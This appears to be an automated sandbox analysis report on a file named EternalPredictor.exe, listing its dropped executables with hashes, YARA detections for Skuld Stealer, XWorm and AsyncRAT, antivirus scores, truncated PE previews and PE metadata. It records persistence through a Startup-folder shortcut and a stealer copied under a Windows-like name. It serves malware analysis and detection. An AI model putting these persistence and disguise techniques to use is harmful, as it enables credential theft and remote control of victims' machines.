                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwmqshlx.val.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wuykgsa3.lvj.ps1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgpecz4i.s2g.psm1

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\skuld.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10375680
                                                                                                                                                                                                                                Entropy (8bit):6.306827139596188
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:OhoRYXiOhqugpWWNeWTQLc4u0u08eOEaB2v/ZmMz/:ao3OhqFHIrLc4uB08erlNz/
                                                                                                                                                                                                                                MD5:DBBD2127D1030E4C9548FDF7DE9983A7
                                                                                                                                                                                                                                SHA1:5B7939A94CBD908AD8F57BB2E5328CCE657C3700
                                                                                                                                                                                                                                SHA-256:8E3601302C0294914808B6537CD27DE961D087BA0807590B981B7F8C8AA5EEE6
                                                                                                                                                                                                                                SHA-512:95A1112C9B062745DF9C20F566CFCB9421221111D02DB0C1A940A5EA230B09C39A487685AE674C350E4641132E3360A19CA0CD8762F7E46CECDE8B7DD85FE5D2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........P........"......@M..R......@H........@...........................................`... .................................................>...............0....................................................................7..x............................text...t>M......@M................. ..`.rdata....F..PM...F..FM.............@..@.data...`{...0...R...&..............@....pdata..0............x..............@..@.xdata.......p.......6..............@..@.idata..>............8..............@....reloc...............>..............@..B.symtab..............P.................B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\eternal.exe
                                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Nov 17 09:21:22 2024, mtime=Sun Nov 17 09:21:22 2024, atime=Sun Nov 17 09:21:22 2024, length=71168, window=hide
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):765
                                                                                                                                                                                                                                Entropy (8bit):5.103999643702136
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:8oD24pkCh3yY//HDdlLEvj8JfYjA1HkZYiY+mV:8o/6OzEvjRA6ZYiY+m
                                                                                                                                                                                                                                MD5:6CFDC2FC41B337A776CC91FA001CF1C1
                                                                                                                                                                                                                                SHA1:3C7D5757F751929A402E4D2C1A7778802EDEA0F3
                                                                                                                                                                                                                                SHA-256:C0F431FC1EE51CEBC60A6195A0968A2B7EC4AA47AED2776A641FCE263DA61F99
                                                                                                                                                                                                                                SHA-512:5474B28C67B58826605048F8D8D5BB7DCE61AA42D613AE160B9721274FB78650FBBB1E2297F89E37217974C5DB9562D58938B09B3588BE3B9F525789CA61A0C1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:L..................F.... .....r.8....r.8....r.8..........................v.:..DG..Yr?.D..U..k0.&...&.......y.Yd....].f.8..D1Ts.8......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BqY.R..........................d...A.p.p.D.a.t.a...B.V.1.....qY.R..Roaming.@......EW)BqY.R...........................)..R.o.a.m.i.n.g.....b.2.....qY.R .XClient.exe.H......qY.RqY.R.....*......................(.X.C.l.i.e.n.t...e.x.e.......Z...............-.......Y.............+j.....C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......971342...........hT..CrF.f4... .I..Yc...,...E...hT..CrF.f4... .I..Yc...,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\XClient.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Roaming\eternal.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):71168
                                                                                                                                                                                                                                Entropy (8bit):6.026372989128195
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:dEmkVu+xslqytUTZfJM6htYxrlYCbM1/kCxtD6LOSIcRGPUC:dEZZx8q/fJLtYFZbM1segO3cQ8C
                                                                                                                                                                                                                                MD5:7439CC991A9A756C41153B8E9121BAAB
                                                                                                                                                                                                                                SHA1:C62528386E5F62FF2975CC8ED0CAD3A7D362E632
                                                                                                                                                                                                                                SHA-256:31A2B821E933BB193D94438D4A5AA036519535336C936D65B66889FB03164E2D
                                                                                                                                                                                                                                SHA-512:CBDFD77671884407F8F4BD9C5251DF5D8896B29BD004EA52460EDA8A222DF7492C69572E044376315624220F3EA66DE3AFF34323EA281591CA2975F90FA6DD51
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g.............................+... ...@....@.. ....................................@.................................P+..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......0^.. .......&.....................................................(....*.r...p*. .x!.*..(....*.r...p*. ....*.s.........s.........s.........s.........*.r7..p*. .O..*.r...p*.rm..p*. ....*.r...p*. .&..*.r...p*. ....*..((...*.r...p*. .A..*.r...p*. E/..*"(....+.*&(....&+.*.+5sT... .... .'..oU...(,...~....-.(D...(6...~....oV...&.-.*.r...p*. *p{.*.r...p*. ^...*.r...p*. ....*.r...p*.r1..p*. t...*..............j..................sW..............*"(F...+.*:.t....(A...+.*.r]..p*

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\eternal.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\EternalPredictor.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):71168
                                                                                                                                                                                                                                Entropy (8bit):6.026372989128195
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:dEmkVu+xslqytUTZfJM6htYxrlYCbM1/kCxtD6LOSIcRGPUC:dEZZx8q/fJLtYFZbM1segO3cQ8C
                                                                                                                                                                                                                                MD5:7439CC991A9A756C41153B8E9121BAAB
                                                                                                                                                                                                                                SHA1:C62528386E5F62FF2975CC8ED0CAD3A7D362E632
                                                                                                                                                                                                                                SHA-256:31A2B821E933BB193D94438D4A5AA036519535336C936D65B66889FB03164E2D
                                                                                                                                                                                                                                SHA-512:CBDFD77671884407F8F4BD9C5251DF5D8896B29BD004EA52460EDA8A222DF7492C69572E044376315624220F3EA66DE3AFF34323EA281591CA2975F90FA6DD51
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\eternal.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\eternal.exe, Author: ditekSHen
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....g.............................+... ...@....@.. ....................................@.................................P+..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......0^.. .......&.....................................................(....*.r...p*. .x!.*..(....*.r...p*. ....*.s.........s.........s.........s.........*.r7..p*. .O..*.r...p*.rm..p*. ....*.r...p*. .&..*.r...p*. ....*..((...*.r...p*. .A..*.r...p*. E/..*"(....+.*&(....&+.*.+5sT... .... .'..oU...(,...~....-.(D...(6...~....oV...&.-.*.r...p*. *p{.*.r...p*. ^...*.r...p*. ....*.r...p*.r1..p*. t...*..............j..................sW..............*"(F...+.*:.t....(A...+.*.r]..p*

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\program.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\EternalPredictor.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7954796
                                                                                                                                                                                                                                Entropy (8bit):7.993357815338302
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:196608:7YHYUNwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jL:4CIHziK1piXLGVE4Ue0VJ3
                                                                                                                                                                                                                                MD5:3E6865657B29FAEA3A355C710F0AAD45
                                                                                                                                                                                                                                SHA1:AD9B98FA0F96685ABC17AAAB7FE4D65AC8FE34F7
                                                                                                                                                                                                                                SHA-256:2C48F7BC874F1C812C0031519E756C28F940A58B2F64CDB40A08F1CCC798F671
                                                                                                                                                                                                                                SHA-512:B360B5A244E83EE95719D7E781B9A49A29A5251E936619786B0151D0992AEE33746109B3A8B0AB8D18C2788B738892C9B296C8C601025E16D850D730837B1615
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d......g.........."....).....p.................@....................................Q$z...`.................................................\...x....p..L....@..P"..$=y.H$......d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc...L....p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\skuld.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\EternalPredictor.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10375680
                                                                                                                                                                                                                                Entropy (8bit):6.306827139596188
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:OhoRYXiOhqugpWWNeWTQLc4u0u08eOEaB2v/ZmMz/:ao3OhqFHIrLc4uB08erlNz/
                                                                                                                                                                                                                                MD5:DBBD2127D1030E4C9548FDF7DE9983A7
                                                                                                                                                                                                                                SHA1:5B7939A94CBD908AD8F57BB2E5328CCE657C3700
                                                                                                                                                                                                                                SHA-256:8E3601302C0294914808B6537CD27DE961D087BA0807590B981B7F8C8AA5EEE6
                                                                                                                                                                                                                                SHA-512:95A1112C9B062745DF9C20F566CFCB9421221111D02DB0C1A940A5EA230B09C39A487685AE674C350E4641132E3360A19CA0CD8762F7E46CECDE8B7DD85FE5D2
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\skuld.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: C:\Users\user\AppData\Roaming\skuld.exe, Author: Joe Security
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........P........"......@M..R......@H........@...........................................`... .................................................>...............0....................................................................7..x............................text...t>M......@M................. ..`.rdata....F..PM...F..FM.............@..@.data...`{...0...R...&..............@....pdata..0............x..............@..@.xdata.......p.......6..............@..@.idata..>............8..............@....reloc...............>..............@..B.symtab..............P.................B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Entropy (8bit):7.999079241862902
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                File name:EternalPredictor.exe
                                                                                                                                                                                                                                File size:18'412'032 bytes
                                                                                                                                                                                                                                MD5:7d207c243b33d6f3d78acadffd95ae0e
                                                                                                                                                                                                                                SHA1:a3ad8109c208b12d35359e78f4ebc23ed79ccf24
                                                                                                                                                                                                                                SHA256:dc23f531b2e23535601968a1453a45565c9214264d4ef3d016c0a983ed720c30
                                                                                                                                                                                                                                SHA512:ac9740408cd0dc7ff93835defed55af7359456eaa2cd092704e6f7ffe5fa3ea3b87d9ab927e4c06e96f9c030f8dc14cffe157ccf74618aa4ea9c33d875fca0fd
                                                                                                                                                                                                                                SSDEEP:393216:U8o6tLbdhAQdfxvzbjv1sIUO82oi61Mlk+kv4af0ADcOeIsP:UsbPJpvpn82oi6ulkPLf0WcOeR
                                                                                                                                                                                                                                TLSH:3307121F61DC1798E4FA8A7555533E3C1E6499FA31EB68BC1A4210CCB07F78C2F8A499
                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ... ....@.. .......................`............@................................

                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                Icon Hash:00928e8e8686b000

                                                                                                                                                                                                                                Static PE Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Entrypoint:0x159068e
                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                Time Stamp:0x671B8501 [Fri Oct 25 11:46:09 2024 UTC]
                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                                                                                                                                                OS Version Major:4
                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                File Version Major:4
                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                                                                                                Entrypoint Preview

                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al
                                                                                                                                                                                                                                add byte ptr [eax], al

                                                                                                                                                                                                                                Data Directories

                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x11906340x57.text
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x11920000x500.rsrc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x11940000xc.reloc
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                Sections

                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                .text0x20000x118e6940x118e800adcee02768fa6176c74482f4df4e937aunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .rsrc0x11920000x5000x6003d7b19024a26d901bdeba68e7b96bfc8False0.37890625data3.784430201595601IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                .reloc0x11940000xc0x200bcba337246c8a2a7e5ca5c83ddef6cfaFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                Resources

                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                RT_VERSION0x11920a00x26cdata0.45161290322580644
                                                                                                                                                                                                                                RT_MANIFEST0x11923100x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                                                                                                                                                Imports

                                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                                mscoree.dll_CorExeMain

